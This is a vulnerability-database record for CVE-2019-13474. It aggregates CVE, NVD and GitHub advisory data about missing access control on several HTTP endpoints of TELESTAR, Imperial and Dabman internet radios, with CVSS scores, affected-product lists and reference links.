CVE-2019-13474 (GCVE-0-2019-13474)

Vulnerability from cvelistv5 – Published: 2019-09-16 00:00 – Updated: 2024-08-04 23:57

Summary

TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands.

Severity

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

Assigner

mitre

References

4 references

URL	Tags
https://www.vulnerability-lab.com/get_content.php…
http://seclists.org/fulldisclosure/2019/Sep/12
http://seclists.org/fulldisclosure/2023/Sep/1	mailing-list
http://packetstormsecurity.com/files/174503/Inter…

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T23:57:37.858Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.vulnerability-lab.com/get_content.php?id=2183"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2019/Sep/12"
          },
          {
            "name": "20230904 Vulnerabilities in Internet Radio auna IR-160 SE (UIProto)",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2023/Sep/1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/174503/Internet-Radio-auna-IR-160-SE-UIProto-DoS-XSS-Missing-Authentication.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-09-05T16:06:25.252Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://www.vulnerability-lab.com/get_content.php?id=2183"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2019/Sep/12"
        },
        {
          "name": "20230904 Vulnerabilities in Internet Radio auna IR-160 SE (UIProto)",
          "tags": [
            "mailing-list"
          ],
          "url": "http://seclists.org/fulldisclosure/2023/Sep/1"
        },
        {
          "url": "http://packetstormsecurity.com/files/174503/Internet-Radio-auna-IR-160-SE-UIProto-DoS-XSS-Missing-Authentication.html"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2019-13474",
    "datePublished": "2019-09-16T00:00:00.000Z",
    "dateReserved": "2019-07-09T00:00:00.000Z",
    "dateUpdated": "2024-08-04T23:57:37.858Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2019-13474",
      "date": "2026-06-05",
      "epss": "0.01301",
      "percentile": "0.80101"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2019-13474\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2019-09-16T12:15:10.847\",\"lastModified\":\"2024-11-21T04:24:58.503\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands.\"},{\"lang\":\"es\",\"value\":\"Los dispositivos TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt y Imperial i600 TN81HH96-g102h-g102, poseen un control de acceso insuficiente para los comandos /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, y /playinfo.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:P/A:P\",\"baseScore\":7.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-798\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:telestar:bobs_rock_radio_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E17F5D40-3E6A-4C0B-8F28-5D96F45FE273\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:telestar:bobs_rock_radio:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"FF18181F-B99B-483C-B779-38C2C84179D0\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:telestar:dabman_d10_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"68DFF28E-E5AA-4047-AF18-A80A15EC6CEB\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:telestar:dabman_d10:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"AF3FE4C9-6A4D-4919-9843-CCC1CB26D67A\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:telestar:dabman_i30_stereo_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"254CA4AF-3CC3-4CDA-AAF5-88835F6B6BFC\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:telestar:dabman_i30_stereo:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"65031EB4-579B-4E6D-9066-27756D021F4E\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:telestar:imperial_i110_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"89245799-021A-4D8B-8539-B705BDB39E9B\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:telestar:imperial_i110:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"FC789F3B-1D46-4646-A798-8ABF326E772E\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:telestar:imperial_i150_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F2626170-1D7F-4B16-B6D9-D3015E2444E0\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:telestar:imperial_i150:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"478E93CC-8681-4307-ABBD-1C036FBC61A4\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:telestar:imperial_i200_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D91ADE9C-14DF-44F8-8310-6657482C365D\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:telestar:imperial_i200:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E20E36FC-CD25-4E84-BB9E-E3225C26252A\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:telestar:imperial_i200-cd_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D8B9F1D2-9A67-43E3-B0F2-ED657E3444F7\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:telestar:imperial_i200-cd:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3584EFD9-E2F5-4DD2-8CB0-F4F70A095B2B\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:telestar:imperial_i400_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"77C4CBB3-EE19-41FC-BD5C-22B5828D7BE4\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:telestar:imperial_i400:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F084C2EF-EDB5-444E-B41C-3D09C844C99D\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:telestar:imperial_i450_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"70788B50-9E5E-4246-A79D-67C0F3BFEF2D\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:telestar:imperial_i450:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7BE2E73A-6C2A-4EE1-ADB3-B91A86BE1138\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:telestar:imperial_i500-bt_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"30B6A1C7-E1AB-4B3C-A074-978F147F9A2B\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:telestar:imperial_i500-bt:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B854016E-329B-470C-B0AA-6C45109EA81A\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:telestar:imperial_i600_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"414960F2-B667-4949-9534-15C0D71D77DE\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:telestar:imperial_i600:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2E80EDE7-635A-41A9-93FD-17C3D773C3DA\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/174503/Internet-Radio-auna-IR-160-SE-UIProto-DoS-XSS-Missing-Authentication.html\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://seclists.org/fulldisclosure/2019/Sep/12\",\"source\":\"cve@mitre.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://seclists.org/fulldisclosure/2023/Sep/1\",\"source\":\"cve@mitre.org\"},{\"url\":\"https://www.vulnerability-lab.com/get_content.php?id=2183\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"http://packetstormsecurity.com/files/174503/Internet-Radio-auna-IR-160-SE-UIProto-DoS-XSS-Missing-Authentication.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://seclists.org/fulldisclosure/2019/Sep/12\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://seclists.org/fulldisclosure/2023/Sep/1\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.vulnerability-lab.com/get_content.php?id=2183\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]}}"
  }
}

FKIE_CVE-2019-13474

Vulnerability from fkie_nvd - Published: 2019-09-16 12:15 - Updated: 2024-11-21 04:24

Severity

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/174503/Internet-Radio-auna-IR-160-SE-UIProto-DoS-XSS-Missing-Authentication.html
cve@mitre.org	http://seclists.org/fulldisclosure/2019/Sep/12	Mailing List, Third Party Advisory
cve@mitre.org	http://seclists.org/fulldisclosure/2023/Sep/1
cve@mitre.org	https://www.vulnerability-lab.com/get_content.php?id=2183	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/174503/Internet-Radio-auna-IR-160-SE-UIProto-DoS-XSS-Missing-Authentication.html
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2019/Sep/12	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2023/Sep/1
af854a3a-2127-422b-91ae-364da2661108	https://www.vulnerability-lab.com/get_content.php?id=2183	Exploit, Third Party Advisory

Impacted products

Vendor	Product	Version
telestar	bobs_rock_radio_firmware	-
telestar	bobs_rock_radio	-
telestar	dabman_d10_firmware	-
telestar	dabman_d10	-
telestar	dabman_i30_stereo_firmware	-
telestar	dabman_i30_stereo	-
telestar	imperial_i110_firmware	-
telestar	imperial_i110	-
telestar	imperial_i150_firmware	-
telestar	imperial_i150	-
telestar	imperial_i200_firmware	-
telestar	imperial_i200	-
telestar	imperial_i200-cd_firmware	-
telestar	imperial_i200-cd	-
telestar	imperial_i400_firmware	-
telestar	imperial_i400	-
telestar	imperial_i450_firmware	-
telestar	imperial_i450	-
telestar	imperial_i500-bt_firmware	-
telestar	imperial_i500-bt	-
telestar	imperial_i600_firmware	-
telestar	imperial_i600	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:telestar:bobs_rock_radio_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E17F5D40-3E6A-4C0B-8F28-5D96F45FE273",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:telestar:bobs_rock_radio:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF18181F-B99B-483C-B779-38C2C84179D0",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:telestar:dabman_d10_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "68DFF28E-E5AA-4047-AF18-A80A15EC6CEB",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:telestar:dabman_d10:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "AF3FE4C9-6A4D-4919-9843-CCC1CB26D67A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:telestar:dabman_i30_stereo_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "254CA4AF-3CC3-4CDA-AAF5-88835F6B6BFC",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:telestar:dabman_i30_stereo:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "65031EB4-579B-4E6D-9066-27756D021F4E",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:telestar:imperial_i110_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "89245799-021A-4D8B-8539-B705BDB39E9B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:telestar:imperial_i110:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "FC789F3B-1D46-4646-A798-8ABF326E772E",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:telestar:imperial_i150_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F2626170-1D7F-4B16-B6D9-D3015E2444E0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:telestar:imperial_i150:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "478E93CC-8681-4307-ABBD-1C036FBC61A4",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:telestar:imperial_i200_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "D91ADE9C-14DF-44F8-8310-6657482C365D",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:telestar:imperial_i200:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E20E36FC-CD25-4E84-BB9E-E3225C26252A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:telestar:imperial_i200-cd_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "D8B9F1D2-9A67-43E3-B0F2-ED657E3444F7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:telestar:imperial_i200-cd:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3584EFD9-E2F5-4DD2-8CB0-F4F70A095B2B",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:telestar:imperial_i400_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "77C4CBB3-EE19-41FC-BD5C-22B5828D7BE4",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:telestar:imperial_i400:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F084C2EF-EDB5-444E-B41C-3D09C844C99D",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:telestar:imperial_i450_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "70788B50-9E5E-4246-A79D-67C0F3BFEF2D",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:telestar:imperial_i450:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "7BE2E73A-6C2A-4EE1-ADB3-B91A86BE1138",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:telestar:imperial_i500-bt_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "30B6A1C7-E1AB-4B3C-A074-978F147F9A2B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:telestar:imperial_i500-bt:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B854016E-329B-470C-B0AA-6C45109EA81A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:telestar:imperial_i600_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "414960F2-B667-4949-9534-15C0D71D77DE",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:telestar:imperial_i600:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E80EDE7-635A-41A9-93FD-17C3D773C3DA",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands."
    },
    {
      "lang": "es",
      "value": "Los dispositivos TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt y Imperial i600 TN81HH96-g102h-g102, poseen un control de acceso insuficiente para los comandos /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, y /playinfo."
    }
  ],
  "id": "CVE-2019-13474",
  "lastModified": "2024-11-21T04:24:58.503",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2019-09-16T12:15:10.847",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://packetstormsecurity.com/files/174503/Internet-Radio-auna-IR-160-SE-UIProto-DoS-XSS-Missing-Authentication.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2019/Sep/12"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://seclists.org/fulldisclosure/2023/Sep/1"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.vulnerability-lab.com/get_content.php?id=2183"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://packetstormsecurity.com/files/174503/Internet-Radio-auna-IR-160-SE-UIProto-DoS-XSS-Missing-Authentication.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2019/Sep/12"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://seclists.org/fulldisclosure/2023/Sep/1"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.vulnerability-lab.com/get_content.php?id=2183"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-798"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-QF9P-Q3FR-QF6R

Vulnerability from github – Published: 2022-05-24 16:56 – Updated: 2023-09-05 06:30

Details

Severity

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2019-13474"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-09-16T12:15:00Z",
    "severity": "HIGH"
  },
  "details": "TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands.",
  "id": "GHSA-qf9p-q3fr-qf6r",
  "modified": "2023-09-05T06:30:13Z",
  "published": "2022-05-24T16:56:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-13474"
    },
    {
      "type": "WEB",
      "url": "https://www.vulnerability-lab.com/get_content.php?id=2183"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/174503/Internet-Radio-auna-IR-160-SE-UIProto-DoS-XSS-Missing-Authentication.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2019/Sep/12"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2023/Sep/1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GSD-2019-13474

Vulnerability from gsd - Updated: 2023-12-13 01:23

Details

Aliases

CVE-2019-13474

Aliases

CVE-2019-13474

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2019-13474",
